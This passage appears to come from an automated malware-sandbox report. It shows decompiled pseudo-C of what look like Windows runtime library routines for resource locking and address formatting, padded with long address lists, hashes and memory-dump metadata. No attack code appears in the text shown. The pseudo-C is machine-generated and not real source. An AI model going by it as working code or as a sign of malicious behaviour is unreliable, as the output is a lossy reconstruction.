													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                                                                          0x020f055a
                                                                                                                                                                                                          0x020f055d
                                                                                                                                                                                                          0x020f0563
                                                                                                                                                                                                          0x020f0566
                                                                                                                                                                                                          0x020f05d8
                                                                                                                                                                                                          0x020f05e2
                                                                                                                                                                                                          0x020f05e5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f05e7
                                                                                                                                                                                                          0x020f05e7
                                                                                                                                                                                                          0x020f05ea
                                                                                                                                                                                                          0x020f05f3
                                                                                                                                                                                                          0x020f05f3
                                                                                                                                                                                                          0x020f0568
                                                                                                                                                                                                          0x020f0568
                                                                                                                                                                                                          0x020f0568
                                                                                                                                                                                                          0x020f0569
                                                                                                                                                                                                          0x020f0569
                                                                                                                                                                                                          0x020f0569
                                                                                                                                                                                                          0x020f056b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211217f
                                                                                                                                                                                                          0x02112183
                                                                                                                                                                                                          0x0211225b
                                                                                                                                                                                                          0x0211225f
                                                                                                                                                                                                          0x02112189
                                                                                                                                                                                                          0x0211218c
                                                                                                                                                                                                          0x0211218f
                                                                                                                                                                                                          0x02112194
                                                                                                                                                                                                          0x02112199
                                                                                                                                                                                                          0x0211219d
                                                                                                                                                                                                          0x021121a0
                                                                                                                                                                                                          0x021121a2
                                                                                                                                                                                                          0x021121ce
                                                                                                                                                                                                          0x021121ce
                                                                                                                                                                                                          0x021121ce
                                                                                                                                                                                                          0x021121d0
                                                                                                                                                                                                          0x021121d6
                                                                                                                                                                                                          0x021121de
                                                                                                                                                                                                          0x021121e2
                                                                                                                                                                                                          0x021121e8
                                                                                                                                                                                                          0x021121e9
                                                                                                                                                                                                          0x021121ec
                                                                                                                                                                                                          0x021121f1
                                                                                                                                                                                                          0x021121f6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021121f8
                                                                                                                                                                                                          0x021121fb
                                                                                                                                                                                                          0x02112206
                                                                                                                                                                                                          0x0211220b
                                                                                                                                                                                                          0x0211220c
                                                                                                                                                                                                          0x02112217
                                                                                                                                                                                                          0x02112226
                                                                                                                                                                                                          0x0211222b
                                                                                                                                                                                                          0x0211222c
                                                                                                                                                                                                          0x0211222f
                                                                                                                                                                                                          0x02112232
                                                                                                                                                                                                          0x02112235
                                                                                                                                                                                                          0x02112235
                                                                                                                                                                                                          0x0211223a
                                                                                                                                                                                                          0x0211223f
                                                                                                                                                                                                          0x02112241
                                                                                                                                                                                                          0x02112243
                                                                                                                                                                                                          0x02112248
                                                                                                                                                                                                          0x02112248
                                                                                                                                                                                                          0x0211224d
                                                                                                                                                                                                          0x0211224f
                                                                                                                                                                                                          0x02112262
                                                                                                                                                                                                          0x02112263
                                                                                                                                                                                                          0x02112268
                                                                                                                                                                                                          0x02112269
                                                                                                                                                                                                          0x02112269
                                                                                                                                                                                                          0x02112269
                                                                                                                                                                                                          0x0211226d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112276
                                                                                                                                                                                                          0x02112279
                                                                                                                                                                                                          0x0211227e
                                                                                                                                                                                                          0x02112283
                                                                                                                                                                                                          0x02112287
                                                                                                                                                                                                          0x0211228a
                                                                                                                                                                                                          0x0211228d
                                                                                                                                                                                                          0x0211228f
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122be
                                                                                                                                                                                                          0x021122c4
                                                                                                                                                                                                          0x021122cc
                                                                                                                                                                                                          0x021122d0
                                                                                                                                                                                                          0x021122d6
                                                                                                                                                                                                          0x021122d7
                                                                                                                                                                                                          0x021122da
                                                                                                                                                                                                          0x021122df
                                                                                                                                                                                                          0x021122e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122e6
                                                                                                                                                                                                          0x021122e9
                                                                                                                                                                                                          0x021122f4
                                                                                                                                                                                                          0x021122f9
                                                                                                                                                                                                          0x021122fa
                                                                                                                                                                                                          0x02112305
                                                                                                                                                                                                          0x02112314
                                                                                                                                                                                                          0x02112319
                                                                                                                                                                                                          0x0211231a
                                                                                                                                                                                                          0x0211231d
                                                                                                                                                                                                          0x02112320
                                                                                                                                                                                                          0x02112323
                                                                                                                                                                                                          0x02112323
                                                                                                                                                                                                          0x02112328
                                                                                                                                                                                                          0x0211232d
                                                                                                                                                                                                          0x0211232f
                                                                                                                                                                                                          0x02112331
                                                                                                                                                                                                          0x02112336
                                                                                                                                                                                                          0x02112336
                                                                                                                                                                                                          0x0211233b
                                                                                                                                                                                                          0x0211233d
                                                                                                                                                                                                          0x02112350
                                                                                                                                                                                                          0x02112351
                                                                                                                                                                                                          0x02112356
                                                                                                                                                                                                          0x02112359
                                                                                                                                                                                                          0x02112359
                                                                                                                                                                                                          0x0211235b
                                                                                                                                                                                                          0x0211235d
                                                                                                                                                                                                          0x020d5367
                                                                                                                                                                                                          0x020d536b
                                                                                                                                                                                                          0x020d5372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112363
                                                                                                                                                                                                          0x02112363
                                                                                                                                                                                                          0x02112369
                                                                                                                                                                                                          0x0211236a
                                                                                                                                                                                                          0x0211236c
                                                                                                                                                                                                          0x02112371
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x0211237a
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x02112385
                                                                                                                                                                                                          0x02112386
                                                                                                                                                                                                          0x02112389
                                                                                                                                                                                                          0x0211238e
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x020d5378
                                                                                                                                                                                                          0x020d537c
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112397
                                                                                                                                                                                                          0x0211239c
                                                                                                                                                                                                          0x021123a2
                                                                                                                                                                                                          0x021123a3
                                                                                                                                                                                                          0x021123a6
                                                                                                                                                                                                          0x021123ab
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b4
                                                                                                                                                                                                          0x021123b9
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123bc
                                                                                                                                                                                                          0x021123bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109153
                                                                                                                                                                                                          0x02109158
                                                                                                                                                                                                          0x0210915a
                                                                                                                                                                                                          0x0210915e
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109171
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x021123c6
                                                                                                                                                                                                          0x021123ce
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112293
                                                                                                                                                                                                          0x02112295
                                                                                                                                                                                                          0x0211229a
                                                                                                                                                                                                          0x021122a1
                                                                                                                                                                                                          0x021122a3
                                                                                                                                                                                                          0x021122a7
                                                                                                                                                                                                          0x021122a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122ab
                                                                                                                                                                                                          0x021122ad
                                                                                                                                                                                                          0x021122af
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122af
                                                                                                                                                                                                          0x021122b1
                                                                                                                                                                                                          0x021122b4
                                                                                                                                                                                                          0x021122b4
                                                                                                                                                                                                          0x021122b6
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d53cb
                                                                                                                                                                                                          0x020d53ce
                                                                                                                                                                                                          0x020d53d0
                                                                                                                                                                                                          0x020d53d4
                                                                                                                                                                                                          0x020d53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d53d8
                                                                                                                                                                                                          0x020d53e3
                                                                                                                                                                                                          0x020d53ea
                                                                                                                                                                                                          0x020d53ea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211228f
                                                                                                                                                                                                          0x02112349
                                                                                                                                                                                                          0x0211234d
                                                                                                                                                                                                          0x02112251
                                                                                                                                                                                                          0x02112251
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112251
                                                                                                                                                                                                          0x021121a4
                                                                                                                                                                                                          0x021121a4
                                                                                                                                                                                                          0x021121a6
                                                                                                                                                                                                          0x021121a8
                                                                                                                                                                                                          0x021121ac
                                                                                                                                                                                                          0x021121b6
                                                                                                                                                                                                          0x021121b8
                                                                                                                                                                                                          0x021121bc
                                                                                                                                                                                                          0x021121be
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021121c0
                                                                                                                                                                                                          0x021121c2
                                                                                                                                                                                                          0x021121c4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021121c4
                                                                                                                                                                                                          0x021121c6
                                                                                                                                                                                                          0x021121c6
                                                                                                                                                                                                          0x021121c8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021121c8
                                                                                                                                                                                                          0x021121a2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112183
                                                                                                                                                                                                          0x020f057b
                                                                                                                                                                                                          0x020f057d
                                                                                                                                                                                                          0x020f0581
                                                                                                                                                                                                          0x020f0583
                                                                                                                                                                                                          0x02112178
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0589
                                                                                                                                                                                                          0x020f058f
                                                                                                                                                                                                          0x020f058f
                                                                                                                                                                                                          0x020f0583
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02112206
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-4236105082
                                                                                                                                                                                                          • Opcode ID: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                                                                                                                                                                                                          • Instruction ID: be7253778e1d9328c9c9b6a3b8262088db2d6b753e4f4cb0bcefcc8555bf9e65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E15109717803216FEB25CA18CCC1FA673AAAF88724F214269ED55DF285DB71EC418B90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020F14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E020F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2192088; // 0x7750189a
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E020E7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E020F13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E020B2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E020BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                                                                          0x020f14c0
                                                                                                                                                                                                          0x020f14cb
                                                                                                                                                                                                          0x020f14d2
                                                                                                                                                                                                          0x020f14d6
                                                                                                                                                                                                          0x020f14da
                                                                                                                                                                                                          0x020f14de
                                                                                                                                                                                                          0x020f14e3
                                                                                                                                                                                                          0x020f157a
                                                                                                                                                                                                          0x020f157a
                                                                                                                                                                                                          0x020f14f1
                                                                                                                                                                                                          0x020f14f3
                                                                                                                                                                                                          0x0211ea0f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ea15
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ea15
                                                                                                                                                                                                          0x020f14f9
                                                                                                                                                                                                          0x020f14f9
                                                                                                                                                                                                          0x020f14fe
                                                                                                                                                                                                          0x020f1504
                                                                                                                                                                                                          0x0211ea1a
                                                                                                                                                                                                          0x0211ea1f
                                                                                                                                                                                                          0x0211ea21
                                                                                                                                                                                                          0x0211ea22
                                                                                                                                                                                                          0x0211ea27
                                                                                                                                                                                                          0x0211ea2a
                                                                                                                                                                                                          0x0211ea2a
                                                                                                                                                                                                          0x020f1515
                                                                                                                                                                                                          0x020f1517
                                                                                                                                                                                                          0x020f156d
                                                                                                                                                                                                          0x020f1572
                                                                                                                                                                                                          0x020f1575
                                                                                                                                                                                                          0x020f1575
                                                                                                                                                                                                          0x020f151e
                                                                                                                                                                                                          0x0211ea50
                                                                                                                                                                                                          0x0211ea55
                                                                                                                                                                                                          0x0211ea58
                                                                                                                                                                                                          0x0211ea58
                                                                                                                                                                                                          0x020f152e
                                                                                                                                                                                                          0x020f1531
                                                                                                                                                                                                          0x020f1533
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f1535
                                                                                                                                                                                                          0x020f1541
                                                                                                                                                                                                          0x020f1549
                                                                                                                                                                                                          0x020f1549
                                                                                                                                                                                                          0x020f1533
                                                                                                                                                                                                          0x020f14f3
                                                                                                                                                                                                          0x020f1559

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 0211EA22
                                                                                                                                                                                                            • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F146B
                                                                                                                                                                                                            • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F1490
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 020F156D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                                                                                                                                                                                                          • Instruction ID: 540c9c4d2d3de464a6b1d186d4dd877d2f46c0818e5861d44fd8c801678c6718
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E21C372940319EBDF61DE94CC41AEEB3ADAF10B04F444425EE4AE3140DB70AA589BE1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020D53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                          			E020D53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021901c0;
									_push(_t92);
									_push(0);
									_t37 = E020AF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E020F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0213217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02103F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E020F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E020D5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E020AF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E020F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E020F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E020F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E020D5329(_t74, _t92);
													_push(1);
													_t48 = E020D53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                                                                          0x020d53ab
                                                                                                                                                                                                          0x020d53ae
                                                                                                                                                                                                          0x020d53b1
                                                                                                                                                                                                          0x020d53b4
                                                                                                                                                                                                          0x020d53b7
                                                                                                                                                                                                          0x020f05b6
                                                                                                                                                                                                          0x020f05c0
                                                                                                                                                                                                          0x020f05c3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f05c9
                                                                                                                                                                                                          0x020f05c9
                                                                                                                                                                                                          0x020f05cc
                                                                                                                                                                                                          0x020f05d5
                                                                                                                                                                                                          0x020f05d5
                                                                                                                                                                                                          0x020d53bd
                                                                                                                                                                                                          0x020d53bd
                                                                                                                                                                                                          0x020d53bd
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112269
                                                                                                                                                                                                          0x0211226d
                                                                                                                                                                                                          0x02112349
                                                                                                                                                                                                          0x0211234d
                                                                                                                                                                                                          0x02112273
                                                                                                                                                                                                          0x02112276
                                                                                                                                                                                                          0x02112279
                                                                                                                                                                                                          0x0211227e
                                                                                                                                                                                                          0x02112283
                                                                                                                                                                                                          0x02112287
                                                                                                                                                                                                          0x0211228a
                                                                                                                                                                                                          0x0211228d
                                                                                                                                                                                                          0x0211228f
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122be
                                                                                                                                                                                                          0x021122c4
                                                                                                                                                                                                          0x021122cc
                                                                                                                                                                                                          0x021122d0
                                                                                                                                                                                                          0x021122d6
                                                                                                                                                                                                          0x021122d7
                                                                                                                                                                                                          0x021122da
                                                                                                                                                                                                          0x021122df
                                                                                                                                                                                                          0x021122e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122e6
                                                                                                                                                                                                          0x021122e9
                                                                                                                                                                                                          0x021122f4
                                                                                                                                                                                                          0x021122f9
                                                                                                                                                                                                          0x021122fa
                                                                                                                                                                                                          0x02112305
                                                                                                                                                                                                          0x02112314
                                                                                                                                                                                                          0x02112319
                                                                                                                                                                                                          0x0211231a
                                                                                                                                                                                                          0x0211231d
                                                                                                                                                                                                          0x02112320
                                                                                                                                                                                                          0x02112323
                                                                                                                                                                                                          0x02112323
                                                                                                                                                                                                          0x02112328
                                                                                                                                                                                                          0x0211232d
                                                                                                                                                                                                          0x0211232f
                                                                                                                                                                                                          0x02112331
                                                                                                                                                                                                          0x02112336
                                                                                                                                                                                                          0x02112336
                                                                                                                                                                                                          0x0211233b
                                                                                                                                                                                                          0x0211233d
                                                                                                                                                                                                          0x02112350
                                                                                                                                                                                                          0x02112351
                                                                                                                                                                                                          0x02112356
                                                                                                                                                                                                          0x02112359
                                                                                                                                                                                                          0x02112359
                                                                                                                                                                                                          0x0211235b
                                                                                                                                                                                                          0x0211235d
                                                                                                                                                                                                          0x020d5367
